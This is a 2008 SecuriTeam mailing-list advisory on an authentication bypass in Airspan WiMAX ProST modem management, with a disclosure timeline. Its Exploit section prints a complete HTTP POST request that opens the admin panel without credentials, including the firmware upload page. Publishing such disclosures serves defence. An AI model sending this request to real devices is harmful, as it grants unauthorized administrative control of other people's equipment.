[NEWS] Airspan WiMAX ProST Authentication Bypass Vulnerability
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 16 Mar 2008 12:38:54 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Airspan WiMAX ProST Authentication Bypass Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.airspan.com/> Airspan is "a worldwide leader in broadband
wireless with over 400 customers in more than 100 countries. As a founding
member of the WiMAX forum, Airspan has led the way in WiMAX, being among
the first wave of companies to achieve certification for its Base Station
and End User Devices". A vulnerability in Airspan WiMAX product allows
remote attackers to bypass the authentication mechanism used by the
product with very simple means.
DETAILS
Vulnerable Systems:
* Airspan ProST with firmware version prior to 6.5.40.0 with Hardware rev
prior to 4.1
Remote exploitation of an authentication bypass vulnerability in Airspan
ProST Modem management allows attackers to access all options available in
administration panel.
This issue is due to a failure of the application to properly handle
access validation functionality. The access gained through this issue
grants admin privileges.
Exploit:
The attacker have to craft a malicious request.
Example:
POST /process_adv/ HTTP/1.1
Host: 10.0.0.1
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
DialogText=&Advanced=1
It will display options page number #1, which is Software Download for
Firmware upgrade. You can increment 'Advanced' value to see others
options.
Disclosure timeline:
15/10/2007 - Initial vendor notification
16/10/2007 - Initial vendor response
13/03/2008 - Coordinated public disclosure
ADDITIONAL INFORMATION
The information has been provided by <mailto:admin@xxxxxxxxxx> Francis
Lacoste-Cordeau.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NEWS] MG-SOFT Net Inspector Multiple Vulnerabilities
- Next by Date: [NEWS] IBM Informix Dynamic Server Authentication Password Stack Overflow Vulnerability
- Previous by thread: [NEWS] MG-SOFT Net Inspector Multiple Vulnerabilities
- Next by thread: [NEWS] IBM Informix Dynamic Server Authentication Password Stack Overflow Vulnerability
- Index(es):